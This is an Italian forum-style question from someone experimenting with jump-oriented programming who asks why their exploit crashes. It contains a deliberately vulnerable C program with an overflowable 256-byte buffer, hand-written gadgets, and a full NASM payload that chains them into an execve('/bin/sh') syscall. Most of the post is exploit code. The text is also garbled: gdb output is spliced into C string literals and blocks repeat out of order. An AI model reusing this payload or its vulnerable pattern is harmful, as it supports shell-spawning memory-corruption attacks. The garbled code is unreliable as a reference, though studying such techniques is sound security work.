Ho trovato questo post interessante su jop e da quando ho non avevo familiarità con il concetto che ho deciso di giocare con esso. Sono riuscito a chiamare funzioni arbitrarie definite nel mio binario con o senza argomenti, ma non sono mai riuscito a eseguire l'esempio indicato nel post.
Quello che sta facendo è definire i suoi gadget e un programma vulnerabile come può essere visto sotto
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <unistd.h>
char* executable="/bin//sh";
char* null="(gdb) print $ebp
$1 = (void *) 0xffffce78
(gdb) print $ebp - 0x6c
$2 = (void *) 0xffffce0c
; Constants:
base: equ 0xbfff42d0 ; Address where this buffer is loaded
;base: equ 0xffffd2b0 ; Address where this buffer is loaded under gdb (the stack addresses change when gdb is present.)
dispatcher: equ 0x804847e ; Address of the dispatcher gadget
initializer equ dispatcher+5 ; Address of initializer gadget
to_executable: equ 0x80485c0 ; Points to the string "/bin/sh"
to_null: equ 0x80485c9 ; Points to a null dword (0x00000000)
buffer_length: equ 0x108 ; Target program's buffer size.
Segmentation fault (core dumped)
FILE * fd;
void attack_payload () {
asm(".intel_syntax noprefix");
asm("add ebp,edi; jmp [ebp-0x39];");
asm("popa; jmp [ebx-0x3e];");
asm("popa; fdivr st(1), st; jmp [edx];");
asm("inc eax; fdivr st(1), st; jmp [edx];");
asm("mov [ebx-0x17bc0000], ah; stc; jmp [edx];");
asm("inc ebx; fdivr st(1), st; jmp [edx];");
asm("popa; cmc; jmp dword ptr [ecx];");
asm("xchg ecx, eax; fdiv st, st(3); jmp [esi-0xf];");
asm("mov eax, [esi+0xc]; mov [esp], eax; call [esi+0x4];");
asm("int 0x80");
asm(".att_syntax noprefix");
void overflow() {
char buf[256];
//printf("%p", buf);
int main(int argc, char** argv) {
char* filename = "exploit";
if(argc>1) filename = argv[1];
fd=fopen(filename, "r");
Usando gdb penso di aver trovato gli indirizzi corretti delle costanti come definito nel payload
; Constants:
base: equ 0xbfff42d0 ; Address where this buffer is loaded
;base: equ 0xffffd2b0 ; Address where this buffer is loaded under gdb (the stack addresses change when gdb is present.)
dispatcher: equ 0x804847e ; Address of the dispatcher gadget
initializer equ dispatcher+5 ; Address of initializer gadget
to_executable: equ 0x80485c0 ; Points to the string "/bin/sh"
to_null: equ 0x80485c9 ; Points to a null dword (0x00000000)
buffer_length: equ 0x108 ; Target program's buffer size.
; The dispatch table is below (in reverse order)
g0a: dd dispatcher+52 ; int 0x80
g09: dd dispatcher+43 ; mov eax, [esi+0xc] ; mov [esp], eax ; call [esi+0x4]
g08: dd dispatcher+37 ; xchg ecx, eax ; fdiv st, st(3) ; jmp [esi-0xf]
g07: dd dispatcher+33 ; popa ; cmc ; jmp [ecx]
g06: dd dispatcher+19 ; mov [ebx-0x17bc0000], ah ; stc ; jmp [edx]
g05: dd dispatcher+28 ; inc ebx ; fdivr st(1), st ; jmp [edx]
g04: dd dispatcher+19 ; mov [ebx-0x17bc0000], ah ; stc ; jmp [edx]
g03: dd dispatcher+28 ; inc ebx ; fdivr st(1), st ; jmp [edx]
g02: dd dispatcher+19 ; mov [ebx-0x17bc0000], ah ; stc ; jmp [edx]
g01: dd dispatcher+14 ; inc eax ; fdivr st(1), st ; jmp [edx]
g00: dd dispatcher+9 ; popa ; fdivr st(1), st ; jmp [edx]
g_start: ; Start of the dispatch table, which is in reverse order.
; Don't know why but there is an 8-byte padding between the buffer and the return address
times buffer_length+8 - ($-start) db 'x' ; Pad to the end of the legal buffer
; Stuff to overwrite return address goes here
stored_ebp: dd 0xaaaaaaaa
ret_address: dd initializer
; Start of the stack. Data read by initializer gadget "popa":
popa0_edi: dd -4 ; Delta for dispatcher; negative to avoid NULLs
popa0_esi: dd 0xaaaaaaaa
popa0_ebp: dd base+g_start+0x39 ; Starting jump target for dispatcher (plus 0x39)
popa0_esp: dd 0xaaaaaaaa
popa0_ebx: dd base+to_dispatcher+0x3e ; Jumpback for initializer (plus 0x3e)
popa0_edx: dd 0xaaaaaaaa
popa0_ecx: dd 0xaaaaaaaa
popa0_eax: dd 0xaaaaaaaa
; Data read by "popa" for the null-writer gadgets:
popa1_edi: dd -4 ; Delta for dispatcher
popa1_esi: dd base+to_dispatcher ; Jumpback for gadgets ending in "jmp [esi]"
popa1_ebp: dd base+g00+0x39 ; Maintain current dispatch table offset
popa1_esp: dd 0xaaaaaaaa
popa1_ebx: dd base+new_eax+0x17bc0000+1 ; Null-writer clears the 3 high bytes of future eax
popa1_edx: dd base+to_dispatcher ; Jumpback for gadgets ending "jmp [edx]"
popa1_ecx: dd 0xaaaaaaaa
popa1_eax: dd -1 ; When we increment eax later, it becomes 0
; Data read by "popa" to prepare for the system call:
popa2_edi: dd -4 ; Delta for dispatcher
popa2_esi: dd base+esi_addr ; Jumpback for "jmp [esi+K]" for a few values of K
popa2_ebp: dd base+g07+0x39 ; Maintain current dispatch table offset
popa2_esp: dd 0xaaaaaaaa
popa2_ebx: dd to_executable ; Syscall EBX = 1st execve arg (filename)
popa2_edx: dd to_null ; Syscall EDX = 3rd execve arg (envp)
popa2_ecx: dd base+to_dispatcher ; Jumpback for "jmp [ecx]"
popa2_eax: dd to_null ; Swapped into ECX for syscall. 2nd execve arg (argv)
; End of stack, start of a general data region used in manual addressing
dd dispatcher ; Jumpback for "jmp [esi-0xf]"
times 0xB db 'X' ; Filler
esi_addr: dd dispatcher ; Jumpback for "jmp [esi]"
dd dispatcher ; Jumpback for "jmp [esi+0x4]"
times 4 db 'Z' ; Filler
new_eax: dd 0xEEEEEE0B ; Sets syscall EAX via [esi+0xc]; EE bytes will be cleared
times 3 db 'Z' ; Filler
to_dispatcher: dd dispatcher ; Address of the dispatcher: add ebp,edi ; jmp [ebp-0x39]
dw 0x73 ; The standard code segment; allows far jumps; ends in NULL
Le mie costanti assomigliano a questo (dopo aver modificato anche la dimensione del buffer)
nasm exploit.nasm
Quando eseguo il programma, invece di ottenere una shell ottengo
char shellcode[] =
L'intero exploit stesso è il seguente
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <unistd.h>
char* executable="/bin//sh";
char* null="(gdb) print $ebp
$1 = (void *) 0xffffce78
(gdb) print $ebp - 0x6c
$2 = (void *) 0xffffce0c
; Constants:
base: equ 0xbfff42d0 ; Address where this buffer is loaded
;base: equ 0xffffd2b0 ; Address where this buffer is loaded under gdb (the stack addresses change when gdb is present.)
dispatcher: equ 0x804847e ; Address of the dispatcher gadget
initializer equ dispatcher+5 ; Address of initializer gadget
to_executable: equ 0x80485c0 ; Points to the string "/bin/sh"
to_null: equ 0x80485c9 ; Points to a null dword (0x00000000)
buffer_length: equ 0x108 ; Target program's buffer size.
Segmentation fault (core dumped)
FILE * fd;
void attack_payload () {
asm(".intel_syntax noprefix");
asm("add ebp,edi; jmp [ebp-0x39];");
asm("popa; jmp [ebx-0x3e];");
asm("popa; fdivr st(1), st; jmp [edx];");
asm("inc eax; fdivr st(1), st; jmp [edx];");
asm("mov [ebx-0x17bc0000], ah; stc; jmp [edx];");
asm("inc ebx; fdivr st(1), st; jmp [edx];");
asm("popa; cmc; jmp dword ptr [ecx];");
asm("xchg ecx, eax; fdiv st, st(3); jmp [esi-0xf];");
asm("mov eax, [esi+0xc]; mov [esp], eax; call [esi+0x4];");
asm("int 0x80");
asm(".att_syntax noprefix");
void overflow() {
char buf[256];
//printf("%p", buf);
int main(int argc, char** argv) {
char* filename = "exploit";
if(argc>1) filename = argv[1];
fd=fopen(filename, "r");
Lo compilo usando nasm v2.07 per evitare il problema di exploit.nasm:47: warning: dword data exceeds bounds
e compilarlo in questo modo
; Constants:
base: equ 0xbfff42d0 ; Address where this buffer is loaded
;base: equ 0xffffd2b0 ; Address where this buffer is loaded under gdb (the stack addresses change when gdb is present.)
dispatcher: equ 0x804847e ; Address of the dispatcher gadget
initializer equ dispatcher+5 ; Address of initializer gadget
to_executable: equ 0x80485c0 ; Points to the string "/bin/sh"
to_null: equ 0x80485c9 ; Points to a null dword (0x00000000)
buffer_length: equ 0x108 ; Target program's buffer size.
; The dispatch table is below (in reverse order)
g0a: dd dispatcher+52 ; int 0x80
g09: dd dispatcher+43 ; mov eax, [esi+0xc] ; mov [esp], eax ; call [esi+0x4]
g08: dd dispatcher+37 ; xchg ecx, eax ; fdiv st, st(3) ; jmp [esi-0xf]
g07: dd dispatcher+33 ; popa ; cmc ; jmp [ecx]
g06: dd dispatcher+19 ; mov [ebx-0x17bc0000], ah ; stc ; jmp [edx]
g05: dd dispatcher+28 ; inc ebx ; fdivr st(1), st ; jmp [edx]
g04: dd dispatcher+19 ; mov [ebx-0x17bc0000], ah ; stc ; jmp [edx]
g03: dd dispatcher+28 ; inc ebx ; fdivr st(1), st ; jmp [edx]
g02: dd dispatcher+19 ; mov [ebx-0x17bc0000], ah ; stc ; jmp [edx]
g01: dd dispatcher+14 ; inc eax ; fdivr st(1), st ; jmp [edx]
g00: dd dispatcher+9 ; popa ; fdivr st(1), st ; jmp [edx]
g_start: ; Start of the dispatch table, which is in reverse order.
; Don't know why but there is an 8-byte padding between the buffer and the return address
times buffer_length+8 - ($-start) db 'x' ; Pad to the end of the legal buffer
; Stuff to overwrite return address goes here
stored_ebp: dd 0xaaaaaaaa
ret_address: dd initializer
; Start of the stack. Data read by initializer gadget "popa":
popa0_edi: dd -4 ; Delta for dispatcher; negative to avoid NULLs
popa0_esi: dd 0xaaaaaaaa
popa0_ebp: dd base+g_start+0x39 ; Starting jump target for dispatcher (plus 0x39)
popa0_esp: dd 0xaaaaaaaa
popa0_ebx: dd base+to_dispatcher+0x3e ; Jumpback for initializer (plus 0x3e)
popa0_edx: dd 0xaaaaaaaa
popa0_ecx: dd 0xaaaaaaaa
popa0_eax: dd 0xaaaaaaaa
; Data read by "popa" for the null-writer gadgets:
popa1_edi: dd -4 ; Delta for dispatcher
popa1_esi: dd base+to_dispatcher ; Jumpback for gadgets ending in "jmp [esi]"
popa1_ebp: dd base+g00+0x39 ; Maintain current dispatch table offset
popa1_esp: dd 0xaaaaaaaa
popa1_ebx: dd base+new_eax+0x17bc0000+1 ; Null-writer clears the 3 high bytes of future eax
popa1_edx: dd base+to_dispatcher ; Jumpback for gadgets ending "jmp [edx]"
popa1_ecx: dd 0xaaaaaaaa
popa1_eax: dd -1 ; When we increment eax later, it becomes 0
; Data read by "popa" to prepare for the system call:
popa2_edi: dd -4 ; Delta for dispatcher
popa2_esi: dd base+esi_addr ; Jumpback for "jmp [esi+K]" for a few values of K
popa2_ebp: dd base+g07+0x39 ; Maintain current dispatch table offset
popa2_esp: dd 0xaaaaaaaa
popa2_ebx: dd to_executable ; Syscall EBX = 1st execve arg (filename)
popa2_edx: dd to_null ; Syscall EDX = 3rd execve arg (envp)
popa2_ecx: dd base+to_dispatcher ; Jumpback for "jmp [ecx]"
popa2_eax: dd to_null ; Swapped into ECX for syscall. 2nd execve arg (argv)
; End of stack, start of a general data region used in manual addressing
dd dispatcher ; Jumpback for "jmp [esi-0xf]"
times 0xB db 'X' ; Filler
esi_addr: dd dispatcher ; Jumpback for "jmp [esi]"
dd dispatcher ; Jumpback for "jmp [esi+0x4]"
times 4 db 'Z' ; Filler
new_eax: dd 0xEEEEEE0B ; Sets syscall EAX via [esi+0xc]; EE bytes will be cleared
times 3 db 'Z' ; Filler
to_dispatcher: dd dispatcher ; Address of the dispatcher: add ebp,edi ; jmp [ebp-0x39]
dw 0x73 ; The standard code segment; allows far jumps; ends in NULL
per produrre un file di 408 byte simile a questo;
nasm exploit.nasm
Perché non funziona come previsto? Sospetto che abbia a che fare con me definire posizioni di memoria sbagliate per il dispatcher da quando ho visto un comportamento simile su esempi più semplici che ho provato.